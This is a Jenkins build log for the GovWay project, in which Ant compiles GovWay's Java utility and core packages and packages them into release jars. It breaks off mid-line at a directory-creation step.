17:51:27 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:27 [WARNING] [echo] **************************************** 17:51:27 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:27 [WARNING] [echo] **************************************** 17:51:27 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:27 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/datasource] 17:51:27 [INFO] [javac] Compiling 7 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:28 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-datasource_RELEASE.jar 17:51:28 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:32 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:32 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:32 [WARNING] [echo] **************************************** 17:51:32 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:32 [WARNING] [echo] **************************************** 17:51:32 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:32 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/sonde] 17:51:32 [INFO] [javac] Compiling 8 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:33 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-sonde_RELEASE.jar 17:51:33 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:40 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:40 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:40 [WARNING] [echo] **************************************** 17:51:40 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:40 [WARNING] [echo] **************************************** 17:51:40 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:40 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/semaphore] 17:51:40 [INFO] [javac] Compiling 10 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:41 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-semaphore_RELEASE.jar 17:51:41 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:47 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:47 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:47 [WARNING] [echo] **************************************** 17:51:47 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:47 [WARNING] [echo] **************************************** 17:51:47 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:47 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/threads] 17:51:47 [INFO] [javac] Compiling 9 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:48 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-threads_RELEASE.jar 17:51:49 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:54 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:54 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:54 [WARNING] [echo] **************************************** 17:51:54 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:54 [WARNING] [echo] **************************************** 17:51:54 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:54 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/oauth2] 17:51:54 [INFO] [javac] Compiling 9 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:55 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-oauth2_RELEASE.jar 17:51:55 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:02 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:52:02 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:52:02 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:52:02 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_utils_RELEASE.jar 17:52:10 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:10 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:52:10 [WARNING] [echo] **************************************** 17:52:10 [WARNING] [echo] **** DEBUG MODE ON ***** 17:52:10 [WARNING] [echo] **************************************** 17:52:10 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/utils-test 17:52:10 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:52:10 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/test] 17:52:10 [INFO] [javac] Compiling 67 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:11 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils-test/openspcoop2_utils-test_RELEASE.jar 17:52:11 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:14 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:52:14 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:52:14 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:52:14 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_utils-test_RELEASE.jar 17:52:21 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:21 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:52:21 [WARNING] [echo] **************************************** 17:52:21 [WARNING] [echo] **** DEBUG MODE ON ***** 17:52:21 [WARNING] [echo] **************************************** 17:52:21 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:52:21 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/generic_project/src/] 17:52:21 [INFO] [javac] Compiling 207 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:25 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_generic-project_RELEASE.jar 17:52:25 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:41 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:41 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:52:41 [WARNING] [echo] **************************************** 17:52:41 [WARNING] [echo] **** DEBUG MODE ON ***** 17:52:41 [WARNING] [echo] **************************************** 17:52:41 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/schemi 17:52:41 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:52:42 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/schemi/openspcoop2_schemi-xsd-openspcoop2_RELEASE.jar 17:52:46 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:46 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:46 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:52:46 [WARNING] [echo] **************************************** 17:52:46 [WARNING] [echo] **** DEBUG MODE ON ***** 17:52:46 [WARNING] [echo] **************************************** 17:52:46 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:52:46 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/schemi/openspcoop2_schemi-xsd-standard_RELEASE.jar 17:52:51 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:52:51 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:52:51 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:52:51 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_schemi-xsd_RELEASE.jar 17:52:56 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:56 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:56 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:52:56 [WARNING] [echo] **************************************** 17:52:56 [WARNING] [echo] **** DEBUG MODE ON ***** 17:52:56 [WARNING] [echo] **************************************** 17:52:56 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/message 17:52:56 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:52:57 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/message/context] 17:52:57 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:52:57 [INFO] [javac] Compiling 42 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:52:59 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/message/openspcoop2_message-context_RELEASE.jar 17:52:59 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:03 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:03 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:03 [WARNING] [echo] **************************************** 17:53:03 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:03 [WARNING] [echo] **************************************** 17:53:03 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:03 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/message] 17:53:03 [INFO] [javac] Compiling 111 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:07 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/message/openspcoop2_message_RELEASE.jar 17:53:07 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:11 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:11 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:11 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:53:11 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_message_RELEASE.jar 17:53:18 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:18 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:18 [WARNING] [echo] **************************************** 17:53:18 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:18 [WARNING] [echo] **************************************** 17:53:18 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/core 17:53:18 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:19 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core] 17:53:19 [INFO] [javac] Compiling 12 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:20 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core_RELEASE.jar 17:53:20 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:23 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:23 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:23 [WARNING] [echo] **************************************** 17:53:23 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:23 [WARNING] [echo] **************************************** 17:53:23 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:23 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/id] 17:53:23 [INFO] [javac] Compiling 20 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:24 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-id_RELEASE.jar 17:53:24 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:27 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:27 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:27 [WARNING] [echo] **************************************** 17:53:27 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:27 [WARNING] [echo] **************************************** 17:53:27 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:27 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/commons] 17:53:27 [INFO] [javac] Compiling 21 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:28 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-commons_RELEASE.jar 17:53:28 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:31 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:31 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:31 [WARNING] [echo] **************************************** 17:53:31 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:31 [WARNING] [echo] **************************************** 17:53:31 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:31 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/byok] 17:53:31 [INFO] [javac] Compiling 4 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:32 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-byok_RELEASE.jar 17:53:32 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:35 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:35 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:35 [WARNING] [echo] **************************************** 17:53:35 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:35 [WARNING] [echo] **************************************** 17:53:35 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:35 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/config] 17:53:35 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:53:35 [INFO] [javac] Compiling 346 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:45 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:53:45 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-config_RELEASE.jar 17:53:45 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:49 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:49 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:49 [WARNING] [echo] **************************************** 17:53:49 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:49 [WARNING] [echo] **************************************** 17:53:49 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:49 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/registry] 17:53:49 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:53:49 [INFO] [javac] Compiling 138 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:52 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:53:52 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-registry_RELEASE.jar 17:53:52 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:55 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:55 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:55 [WARNING] [echo] **************************************** 17:53:55 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:55 [WARNING] [echo] **************************************** 17:53:55 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:55 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/tracciamento] 17:53:55 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:53:55 [INFO] [javac] Compiling 81 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:56 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:53:56 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-tracciamento_RELEASE.jar 17:53:56 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:59 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:53:59 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:53:59 [WARNING] [echo] **************************************** 17:53:59 [WARNING] [echo] **** DEBUG MODE ON ***** 17:53:59 [WARNING] [echo] **************************************** 17:53:59 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:53:59 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/diagnostica] 17:53:59 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:53:59 [INFO] [javac] Compiling 28 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:00 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-diagnostica_RELEASE.jar 17:54:00 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:04 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:04 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:04 [WARNING] [echo] **************************************** 17:54:04 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:04 [WARNING] [echo] **************************************** 17:54:04 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:04 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/transazioni] 17:54:04 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:04 [INFO] [javac] Compiling 144 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:08 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:54:08 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-transazioni_RELEASE.jar 17:54:08 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:12 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:12 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:12 [WARNING] [echo] **************************************** 17:54:12 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:12 [WARNING] [echo] **************************************** 17:54:12 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:12 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/eventi] 17:54:12 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:12 [INFO] [javac] Compiling 36 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:14 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:54:14 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-eventi_RELEASE.jar 17:54:14 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:19 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:19 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:19 [WARNING] [echo] **************************************** 17:54:19 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:19 [WARNING] [echo] **************************************** 17:54:19 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:19 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/statistiche] 17:54:19 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:19 [INFO] [javac] Compiling 109 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:24 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:54:24 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-statistiche_RELEASE.jar 17:54:24 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:28 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:28 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:28 [WARNING] [echo] **************************************** 17:54:28 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:28 [WARNING] [echo] **************************************** 17:54:28 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:28 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/plugins] 17:54:28 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:28 [INFO] [javac] Compiling 94 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:31 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:54:31 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-plugins_RELEASE.jar 17:54:31 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:35 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:35 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:35 [WARNING] [echo] **************************************** 17:54:35 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:35 [WARNING] [echo] **************************************** 17:54:35 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:35 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/controllo_traffico] 17:54:35 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:35 [INFO] [javac] Compiling 128 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:39 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:54:39 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-controllo_traffico_RELEASE.jar 17:54:39 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:42 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:42 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:42 [WARNING] [echo] **************************************** 17:54:42 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:42 [WARNING] [echo] **************************************** 17:54:42 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:42 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/allarmi] 17:54:42 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:42 [INFO] [javac] Compiling 76 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:44 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:54:44 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-allarmi_RELEASE.jar 17:54:44 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:47 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:47 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:47 [WARNING] [echo] **************************************** 17:54:47 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:47 [WARNING] [echo] **************************************** 17:54:47 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:47 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/mapping] 17:54:47 [INFO] [javac] Compiling 10 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:48 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-mapping_RELEASE.jar 17:54:48 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:51 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:51 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:51 [WARNING] [echo] **************************************** 17:54:51 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:51 [WARNING] [echo] **************************************** 17:54:51 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:51 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/eccezione/details] 17:54:51 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:51 [INFO] [javac] Compiling 34 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:52 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:54:52 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-eccezione-details_RELEASE.jar 17:54:52 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:55 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:55 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:55 [WARNING] [echo] **************************************** 17:54:55 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:55 [WARNING] [echo] **************************************** 17:54:55 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:55 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/eccezione/router_details] 17:54:55 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:55 [INFO] [javac] Compiling 25 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:56 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-eccezione-router_details_RELEASE.jar 17:54:56 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:58 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:58 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:54:58 [WARNING] [echo] **************************************** 17:54:58 [WARNING] [echo] **** DEBUG MODE ON ***** 17:54:58 [WARNING] [echo] **************************************** 17:54:58 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:54:58 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/core/eccezione/errore_applicativo] 17:54:58 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:54:58 [INFO] [javac] Compiling 38 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:54:59 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:54:59 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/core/openspcoop2_core-eccezione-errore_applicativo_RELEASE.jar 17:54:59 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:55:02 [INFO] [mkdir] Created dir: 